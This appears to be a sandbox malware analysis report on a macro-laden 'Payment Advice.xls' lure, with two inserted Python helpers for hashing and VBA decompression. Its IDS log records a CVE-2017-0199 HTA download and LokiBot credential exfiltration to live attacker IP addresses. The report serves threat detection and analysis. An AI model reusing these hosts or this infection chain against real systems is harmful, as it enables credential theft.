                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Nov 20 06:57:01 2024, Security: 1
                                                                    Category:dropped
                                                                    Size (bytes):935936
                                                                    Entropy (8bit):7.986092737447108
                                                                    Encrypted:false
                                                                    SSDEEP:12288:vCtI9Ien9OVRqfPSMCfhhBKNle3/XPL9dnq/M/+5wyLPH9JwjmeOsjF+8+SaxMDa:TLnCRwSNjBKNA/XTDqHLPkjeoOTxKVc
                                                                    MD5:FE52E1B2FAD0A9DBC313BFCEF716BB24
                                                                    SHA1:588DDDB8316556F896831E956356EE9C42839318
                                                                    SHA-256:81879191E77853BB80A206C89FD2E4342FCD80C10FDEE0B0FCE3D4AA7DE20791
                                                                    SHA-512:A3412C3E99F5D97DBF2DA9CF25F2FB73B1B682763452C105919ED91C1E807E179B3B627F0B58145EE43FCDB48F6F3485493E36059BA4F50BADCB62A7E48265DE
                                                                    Malicious:true
                                                                    Preview:......................>...................................$...........................................................f.......h.......................................................................................................................................................................................................................................................................................................................................................................................................!................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
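The hashes, the 8-bit entropy and the Zone.Identifier content listed for each dropped file above are cheap to recompute locally, which is how an analyst confirms that a sample on disk is the object the report describes. The block below is an added example written for this page, not Joe Sandbox code. It reconstructs the two dropped files whose previews are fully printable (the 1-byte file "1" and the 26-byte [ZoneTransfer] file, both byte-exact from the report), recomputes their digests and entropy, and parses the ZoneId. The entropy threshold for "probably packed" is an assumption of this example, chosen so that the 600576-byte .NET drop at 7.915 trips it while plain text such as the [ZoneTransfer] file at 3.95 does not.

```python
"""Recompute dropped-file triage data: digests, 8-bit entropy, Zone.Identifier.

Added example for this report; not Joe Sandbox code. Inputs marked
"constructed" are built here from the report's printable previews.
"""
import hashlib
import math
from collections import Counter
from typing import Dict

# Constructed inputs, reconstructed from the report's previews.
ONE_BYTE_FILE = b"1"                                    # 1-byte drop, preview "1"
ZONE_IDENTIFIER = b"[ZoneTransfer]\r\n\r\nZoneId=0"    # 26 bytes, CRLF line ends
UNIFORM_BYTES = bytes(range(256)) * 4                   # every byte value equally often

# Assumption of this example: a PE image with entropy above this value is
# treated as packed/encrypted. Plain MSIL rarely gets near 7.9.
PACKED_ENTROPY_THRESHOLD = 7.5

# URLZONE values as stored in the Zone.Identifier alternate data stream.
ZONE_NAMES = {"0": "Local machine", "1": "Local intranet", "2": "Trusted sites",
              "3": "Internet", "4": "Restricted sites"}


def shannon_entropy_8bit(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for a constant file, 8.0 for uniform."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def digests(data: bytes) -> Dict[str, str]:
    """MD5/SHA-1/SHA-256/SHA-512 hex digests, upper-case as the report prints them."""
    return {name: hashlib.new(name, data).hexdigest().upper()
            for name in ("md5", "sha1", "sha256", "sha512")}


def parse_zone_identifier(data: bytes) -> Dict[str, str]:
    """Return the key=value pairs of the [ZoneTransfer] section of a Zone.Identifier ADS."""
    fields: Dict[str, str] = {}
    in_section = False
    for raw in data.decode("ascii", errors="replace").splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line == "[ZoneTransfer]"
            continue
        if in_section and "=" in line:
            key, value = line.split("=", 1)
            fields[key.strip()] = value.strip()
    return fields


def zone_name(data: bytes) -> str:
    """Human-readable zone; ZoneId=0 means no Mark-of-the-Web protections apply."""
    zone_id = parse_zone_identifier(data).get("ZoneId", "")
    return ZONE_NAMES.get(zone_id, "unknown (%r)" % zone_id)


def looks_packed(data: bytes) -> bool:
    """PE-shaped data ('MZ' header) whose entropy exceeds the assumed threshold."""
    return data[:2] == b"MZ" and shannon_entropy_8bit(data) > PACKED_ENTROPY_THRESHOLD


if __name__ == "__main__":
    for label, blob in (("1-byte drop", ONE_BYTE_FILE), ("Zone.Identifier", ZONE_IDENTIFIER)):
        print(label, len(blob), "bytes, entropy %.6f" % shannon_entropy_8bit(blob))
        for name, hexdigest in digests(blob).items():
            print("  ", name, hexdigest)
    print("Zone:", zone_name(ZONE_IDENTIFIER))
```

Run it against a real drop by replacing the constructed byte strings with `open(path, "rb").read()`; the Zone.Identifier of a file is read from the `<path>:Zone.Identifier` stream on NTFS. The ZoneId=0 written beside the Excel-dropped copy matters because Protected View and SmartScreen key off ZoneId=3 (Internet); a copy marked as local machine gets neither.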
                                                                    File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Nov 20 01:29:52 2024, Security: 1
                                                                    Entropy (8bit):7.9810419545717215
                                                                    TrID:
                                                                    • Microsoft Excel sheet (30009/1) 47.99%
                                                                    • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                                    • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                                    File name:Payment Advice.xls
                                                                    File size:1'136'128 bytes
                                                                    MD5:5a69ac58c3133e24a783cf4ea670a243
                                                                    SHA1:7fdf7feed6f105ce6bfeb34fb44c9c58dfe9057e
                                                                    SHA256:f942a3046520f7838e33a1116faf8b9a6615756f044551651207f53b755a024d
                                                                    SHA512:5b338a97aacf226f9e4360eec8fa2149cb5a77836f357e76c276a799625f91ceb4c9b49c0ef13a9fc31a98770eb0088192ba0b05b2ec668beaa5cd71ccc30c04
                                                                    SSDEEP:24576:auq9PLiijE2Z5Z2amwshXCdQtF84LJQohL7m90Ns4Ql1xzRjpCrHac:auEPLiij7Z5ZKwsAsFjLJQohm90Clvzu
                                                                    TLSH:89352355F985EF06D69BA9320CA3D8F22408BC83BF69A2422730779F647D1F81F47195
                                                                    File Content Preview:........................>.......................................................................................................i.......k.......m..............................................................................................................
                                                                    Icon Hash:276ea3a6a6b7bfbf
                                                                    Document Type:OLE
                                                                    Number of OLE Files:1
                                                                    Has Summary Info:
                                                                    Application Name:Microsoft Excel
                                                                    Encrypted Document:True
                                                                    Contains Word Document Stream:False
                                                                    Contains Workbook/Book Stream:True
                                                                    Contains PowerPoint Document Stream:False
                                                                    Contains Visio Document Stream:False
                                                                    Contains ObjectPool Stream:False
                                                                    Flash Objects Count:0
                                                                    Contains VBA Macros:True
                                                                    Code Page:1252
                                                                    Author:
                                                                    Last Saved By:
                                                                    Create Time:2006-09-16 00:00:00
                                                                    Last Saved Time:2024-11-20 01:29:52
                                                                    Creating Application:Microsoft Excel
                                                                    Security:1
                                                                    Document Code Page:1252
                                                                    Thumbnail Scaling Desired:False
                                                                    Contains Dirty Links:False
                                                                    Shared Document:False
                                                                    Changed Hyperlinks:False
                                                                    Application Version:786432
                                                                    General
                                                                    Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                                                    VBA File Name:Sheet1.cls
                                                                    Stream Size:977
                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . w I m . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                                                                    Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 77 49 6d 84 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                    Attribute VB_Name = "Sheet1"
                                                                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                    Attribute VB_GlobalNameSpace = False
                                                                    Attribute VB_Creatable = False
                                                                    Attribute VB_PredeclaredId = True
                                                                    Attribute VB_Exposed = True
                                                                    Attribute VB_TemplateDerived = False
                                                                    Attribute VB_Customizable = True
                                                                    

                                                                    General
                                                                    Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                                                                    VBA File Name:Sheet2.cls
                                                                    Stream Size:977
                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . w I 7 . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                                                                    Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 77 49 37 ef 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                    Attribute VB_Name = "Sheet2"
                                                                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                    Attribute VB_GlobalNameSpace = False
                                                                    Attribute VB_Creatable = False
                                                                    Attribute VB_PredeclaredId = True
                                                                    Attribute VB_Exposed = True
                                                                    Attribute VB_TemplateDerived = False
                                                                    Attribute VB_Customizable = True
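The "Attribute VB_Name = ..." lines shown for each module are the decompressed module source; inside the stream the source sits at the module's text offset as an MS-OVBA CompressedContainer (a 0x01 signature followed by chunks of literal and back-reference tokens). The decoder below is an added example written for this page, not Joe Sandbox or oletools code. The two containers it decodes are constructed by hand so it runs offline; they are not bytes from Payment Advice.xls, and the raw bytes previewed above are the stream header, not the container itself.

```python
"""Decompress an MS-OVBA CompressedContainer (the VBA module source encoding).

Added example for this report; not Joe Sandbox or oletools code.
"""
import re
from typing import Dict

CHUNK_DATA_SIZE = 4096   # one chunk decodes to at most 4096 bytes


def decompress_vba(container: bytes) -> bytes:
    """Decode a CompressedContainer into the module's source text bytes."""
    if not container or container[0] != 0x01:
        raise ValueError("missing CompressedContainer signature byte 0x01")
    out = bytearray()
    pos = 1
    while pos + 2 <= len(container):
        header = int.from_bytes(container[pos:pos + 2], "little")
        if (header >> 12) & 0x7 != 0b011:
            raise ValueError("bad CompressedChunkSignature")
        chunk_size = (header & 0x0FFF) + 3        # size includes the 2-byte header
        is_compressed = bool(header & 0x8000)
        chunk = container[pos + 2:pos + chunk_size]
        pos += chunk_size
        if not is_compressed:
            out += chunk[:CHUNK_DATA_SIZE]        # raw chunk: bytes copied as-is
            continue
        chunk_start = len(out)
        i = 0
        while i < len(chunk):
            flags = chunk[i]                      # one flag bit per following token
            i += 1
            for bit in range(8):
                if i >= len(chunk):
                    break
                if not flags & (1 << bit):
                    out.append(chunk[i])          # LiteralToken: one byte
                    i += 1
                    continue
                token = int.from_bytes(chunk[i:i + 2], "little")
                i += 2
                # CopyToken: the offset/length split widens as the chunk fills.
                produced = len(out) - chunk_start
                bit_count = max((produced - 1).bit_length(), 4)   # ceil(log2(produced)), min 4
                length = (token & (0xFFFF >> bit_count)) + 3
                offset = (token >> (16 - bit_count)) + 1
                if offset > produced:
                    raise ValueError("copy token reaches before chunk start")
                for _ in range(length):           # byte-wise so overlapping copies work
                    out.append(out[-offset])
    return bytes(out)


def module_attributes(source: bytes) -> Dict[str, str]:
    """Collect 'Attribute Name = Value' lines, e.g. VB_Name, from decompressed source."""
    text = source.decode("latin-1")
    return dict(re.findall(r"^Attribute (\w+) = (.*?)\r?$", text, flags=re.M))


def build_literal_container(data: bytes) -> bytes:
    """Constructed input: one compressed chunk made only of literal tokens."""
    if not 0 < len(data) <= CHUNK_DATA_SIZE:
        raise ValueError("single-chunk helper: 1..4096 bytes")
    body = bytearray()
    for start in range(0, len(data), 8):
        body.append(0x00)                         # flag byte: all eight tokens literal
        body += data[start:start + 8]
    header = 0xB000 | (len(body) + 2 - 3)         # compressed flag, signature 011, size-3
    return b"\x01" + header.to_bytes(2, "little") + bytes(body)


# Constructed input: 20 literals, then a CopyToken (offset 20, length 20) that
# repeats them. After 20 bytes the split is 5 offset bits / 11 length bits, so
# the token is (19 << 11) | 17 = 0x9811.
COPY_CONTAINER = (b"\x01" + (0xB018).to_bytes(2, "little")
                  + b"\x00" + b"01234567" + b"\x00" + b"89ABCDEF"
                  + b"\x10" + b"GHIJ" + (0x9811).to_bytes(2, "little"))

SHEET1_SOURCE = b'Attribute VB_Name = "Sheet1"\r\n'

if __name__ == "__main__":
    src = decompress_vba(build_literal_container(SHEET1_SOURCE))
    print(module_attributes(src))
    print(decompress_vba(COPY_CONTAINER))
```

To apply it to a real workbook, read the module stream under `_VBA_PROJECT_CUR/VBA/` with an OLE parser, take the MODULEOFFSET recorded in the `dir` stream for that module, and pass `stream[offset:]` to `decompress_vba`; the attributes dictionary then gives the module names without opening the file in Excel.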
                                                                    

                                                                    General
                                                                    Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                                                                    VBA File Name:Sheet3.cls
                                                                    Stream Size:977
                                                                    Attribute VB_Name = "Sheet3"
                                                                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                    Attribute VB_GlobalNameSpace = False
                                                                    Attribute VB_Creatable = False
                                                                    Attribute VB_PredeclaredId = True
                                                                    Attribute VB_Exposed = True
                                                                    Attribute VB_TemplateDerived = False
                                                                    Attribute VB_Customizable = True
                                                                    

                                                                    General
                                                                    Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                                    VBA File Name:ThisWorkbook.cls
                                                                    Stream Size:985
                                                                    Attribute VB_Name = "ThisWorkbook"
                                                                    Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                                                    Attribute VB_GlobalNameSpace = False
                                                                    Attribute VB_Creatable = False
                                                                    Attribute VB_PredeclaredId = True
                                                                    Attribute VB_Exposed = True
                                                                    Attribute VB_TemplateDerived = False
                                                                    Attribute VB_Customizable = True
                                                                    

                                                                    General
                                                                    Stream Path:\x1CompObj
                                                                    CLSID:
                                                                    File Type:data
                                                                    Stream Size:114
                                                                    Entropy:4.25248375192737
                                                                    Base64 Encoded:True
                                                                    General
                                                                    Stream Path:\x5DocumentSummaryInformation
                                                                    CLSID:
                                                                    File Type:data
                                                                    Stream Size:244
                                                                    Entropy:2.889430592781307
                                                                    Base64 Encoded:False
                                                                    General
                                                                    Stream Path:\x5SummaryInformation
                                                                    CLSID:
                                                                    File Type:data
                                                                    Stream Size:200
                                                                    Entropy:3.2603503175049817
                                                                    Base64 Encoded:False
                                                                    General
                                                                    Stream Path:MBD001C4526/\x1CompObj
                                                                    CLSID:
                                                                    File Type:data
                                                                    Stream Size:99
                                                                    Entropy:3.631242196770981
                                                                    Base64 Encoded:False
                                                                    General
                                                                    Stream Path:MBD001C4526/Package
                                                                    CLSID:
                                                                    File Type:Microsoft Excel 2007+
                                                                    Stream Size:781880
                                                                    Entropy:7.996310602391636
                                                                    Base64 Encoded:True
                                                                    General
                                                                    Stream Path:MBD001C4527/\x1Ole
                                                                    CLSID:
                                                                    File Type:data
                                                                    Stream Size:376
                                                                    Entropy:4.942740636887529
                                                                    Base64 Encoded:False
                                                                    General
                                                                    Stream Path:Workbook
                                                                    CLSID:
                                                                    File Type:Applesoft BASIC program data, first line number 16
                                                                    Stream Size:330975
                                                                    Entropy:7.998619981607586
                                                                    Base64 Encoded:True
                                                                    General
                                                                    Stream Path:_VBA_PROJECT_CUR/PROJECT
                                                                    CLSID:
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Stream Size:521
                                                                    Entropy:5.239208668467886
                                                                    Base64 Encoded:True
                                                                    General
                                                                    Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                                                    CLSID:
                                                                    File Type:data
                                                                    Stream Size:104
                                                                    Entropy:3.0488640812019017
                                                                    Base64 Encoded:False
                                                                    General
                                                                    Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                                                    CLSID:
                                                                    File Type:data
                                                                    Stream Size:2644
                                                                    Entropy:3.981744704608686
                                                                    Base64 Encoded:False
                                                                    General
                                                                    Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                                                    CLSID:
                                                                    File Type:data
                                                                    Stream Size:553
                                                                    Entropy:6.3652621927289355
                                                                    Base64 Encoded:True
                                                                    Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                                    2024-11-20T07:56:32.963004+0100 | 2024449 | ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl | 1 | 192.168.2.22 | 49164 | 192.3.243.136 | 80 | TCP
                                                                    2024-11-20T07:56:32.963009+0100 | 2024197 | ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) | 1 | 192.3.243.136 | 80 | 192.168.2.22 | 49164 | TCP
                                                                    2024-11-20T07:56:35.880012+0100 | 2024449 | ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl | 1 | 192.168.2.22 | 49166 | 192.3.243.136 | 80 | TCP
                                                                    2024-11-20T07:56:35.880037+0100 | 2024197 | ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) | 1 | 192.3.243.136 | 80 | 192.168.2.22 | 49166 | TCP
                                                                    2024-11-20T07:56:57.248279+0100 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.22 | 49168 | 94.156.177.41 | 80 | TCP
                                                                    2024-11-20T07:56:57.248279+0100 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.22 | 49168 | 94.156.177.41 | 80 | TCP
                                                                    2024-11-20T07:56:57.248279+0100 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.22 | 49168 | 94.156.177.41 | 80 | TCP
                                                                    2024-11-20T07:56:57.988472+0100 | 2024312 | ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 | 1 | 192.168.2.22 | 49168 | 94.156.177.41 | 80 | TCP
                                                                    2024-11-20T07:56:59.162067+0100 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.22 | 49169 | 94.156.177.41 | 80 | TCP
                                                                    2024-11-20T07:56:59.162067+0100 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.22 | 49169 | 94.156.177.41 | 80 | TCP
                                                                    2024-11-20T07:56:59.162067+0100 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.22 | 49169 | 94.156.177.41 | 80 | TCP
                                                                    2024-11-20T07:56:59.882200+0100 | 2024312 | ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 | 1 | 192.168.2.22 | 49169 | 94.156.177.41 | 80 | TCP
                                                                    2024-11-20T07:57:00.038068+0100 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.22 | 49170 | 94.156.177.41 | 80 | TCP
                                                                    2024-11-20T07:57:00.038068+0100 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.22 | 49170 | 94.156.177.41 | 80 | TCP
                                                                    2024-11-20T07:57:00.038068+0100 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.22 | 49170 | 94.156.177.41 | 80 | TCP
                                                                    2024-11-20T07:57:00.796820+0100 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.22 | 49170 | 94.156.177.41 | 80 | TCP
                                                                    2024-11-20T07:57:00.796820+0100 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.22 | 49170 | 94.156.177.41 | 80 | TCP
                                                                    2024-11-20T07:57:00.801702+0100 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 94.156.177.41 | 80 | 192.168.2.22 | 49170 | TCP
                                                                    2024-11-20T07:57:00.985981+0100 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.22 | 49171 | 94.156.177.41 | 80 | TCP
                                                                    2024-11-20T07:57:00.985981+0100 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.22 | 49171 | 94.156.177.41 | 80 | TCP
                                                                    2024-11-20T07:57:00.985981+0100 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.22 | 49171 | 94.156.177.41 | 80 | TCP
                                                                    2024-11-20T07:57:01.712250+0100 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.22 | 49171 | 94.156.177.41 | 80 | TCP
                                                                    2024-11-20T07:57:01.712250+0100 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.22 | 49171 | 94.156.177.41 | 80 | TCP
                                                                    2024-11-20T07:57:01.717775+0100 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 94.156.177.41 | 80 | 192.168.2.22 | 49171 | TCP
                                                                    2024-11-20T07:57:01.990103+0100 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.22 | 49172 | 94.156.177.41 | 80 | TCP
                                                                    2024-11-20T07:57:01.990103+0100 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.22 | 49172 | 94.156.177.41 | 80 | TCP
                                                                    2024-11-20T07:57:01.990103+0100 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.22 | 49172 | 94.156.177.41 | 80 | TCP
                                                                    2024-11-20T07:57:02.731919+0100 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.22 | 49172 | 94.156.177.41 | 80 | TCP
                                                                    2024-11-20T07:57:02.731919+0100 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.22 | 49172 | 94.156.177.41 | 80 | TCP
                                                                    2024-11-20T07:57:02.767336+0100 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 94.156.177.41 | 80 | 192.168.2.22 | 49172 | TCP
                                                                    2024-11-20T07:57:03.028263+0100 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.22 | 49173 | 94.156.177.41 | 80 | TCP
                                                                    2024-11-20T07:57:03.028263+0100 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.22 | 49173 | 94.156.177.41 | 80 | TCP
                                                                    2024-11-20T07:57:03.028263+0100 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.22 | 49173 | 94.156.177.41 | 80 | TCP
                                                                    2024-11-20T07:57:03.741633+0100 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.22 | 49173 | 94.156.177.41 | 80 | TCP
                                                                    2024-11-20T07:57:03.741633+0100 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.22 | 49173 | 94.156.177.41 | 80 | TCP
                                                                    2024-11-20T07:57:03.841307+0100 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 94.156.177.41 | 80 | 192.168.2.22 | 49173 | TCP
                                                                    2024-11-20T07:57:04.458084+0100 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.22 | 49174 | 94.156.177.41 | 80 | TCP
                                                                    2024-11-20T07:57:04.458084+0100 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.22 | 49174 | 94.156.177.41 | 80 | TCP
                                                                    2024-11-20T07:57:04.458084+0100 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.22 | 49174 | 94.156.177.41 | 80 | TCP
                                                                    2024-11-20T07:57:05.310719+0100 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.22 | 49174 | 94.156.177.41 | 80 | TCP
                                                                    2024-11-20T07:57:05.310719+0100 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.22 | 49174 | 94.156.177.41 | 80 | TCP
                                                                    2024-11-20T07:57:05.315581+0100 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 94.156.177.41 | 80 | 192.168.2.22 | 49174 | TCP
                                                                    2024-11-20T07:57:05.513581+0100 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.22 | 49176 | 94.156.177.41 | 80 | TCP
                                                                    2024-11-20T07:57:05.513581+0100 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.22 | 49176 | 94.156.177.41 | 80 | TCP
                                                                    2024-11-20T07:57:05.513581+0100 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.22 | 49176 | 94.156.177.41 | 80 | TCP
                                                                    2024-11-20T07:57:06.374526+0100 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.22 | 49176 | 94.156.177.41 | 80 | TCP
                                                                    2024-11-20T07:57:06.374526+0100 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.22 | 49176 | 94.156.177.41 | 80 | TCP
                                                                    2024-11-20T07:57:06.379522+0100 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 94.156.177.41 | 80 | 192.168.2.22 | 49176 | TCP
                                                                    2024-11-20T07:57:07.053237+0100 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.22 | 49177 | 94.156.177.41 | 80 | TCP
                                                                    2024-11-20T07:57:07.053237+0100 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.22 | 49177 | 94.156.177.41 | 80 | TCP
                                                                    2024-11-20T07:57:07.053237+0100 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.22 | 49177 | 94.156.177.41 | 80 | TCP
                                                                    2024-11-20T07:57:07.917653+0100 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.22 | 49177 | 94.156.177.41 | 80 | TCP
                                                                    2024-11-20T07:57:07.917653+0100 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.22 | 49177 | 94.156.177.41 | 80 | TCP
                                                                    2024-11-20T07:57:07.939075+0100 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 94.156.177.41 | 80 | 192.168.2.22 | 49177 | TCP
                                                                    2024-11-20T07:57:08.400152+0100 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.22 | 49178 | 94.156.177.41 | 80 | TCP
                                                                    2024-11-20T07:57:08.400152+0100 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.22 | 49178 | 94.156.177.41 | 80 | TCP
                                                                    2024-11-20T07:57:08.400152+0100 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.22 | 49178 | 94.156.177.41 | 80 | TCP
                                                                    2024-11-20T07:57:09.108399+0100 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.22 | 49178 | 94.156.177.41 | 80 | TCP
                                                                    2024-11-20T07:57:09.108399+0100 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.22 | 49178 | 94.156.177.41 | 80 | TCP
                                                                    2024-11-20T07:57:09.113229+0100 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 94.156.177.41 | 80 | 192.168.2.22 | 49178 | TCP
                                                                    2024-11-20T07:57:09.288353+0100 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.22 | 49182 | 94.156.177.41 | 80 | TCP
                                                                    2024-11-20T07:57:09.288353+0100 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.22 | 49182 | 94.156.177.41 | 80 | TCP
                                                                    2024-11-20T07:57:09.288353+0100 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.22 | 49182 | 94.156.177.41 | 80 | TCP
                                                                    2024-11-20T07:57:10.035512+0100 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.22 | 49182 | 94.156.177.41 | 80 | TCP
                                                                    2024-11-20T07:57:10.035512+0100 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.22 | 49182 | 94.156.177.41 | 80 | TCP
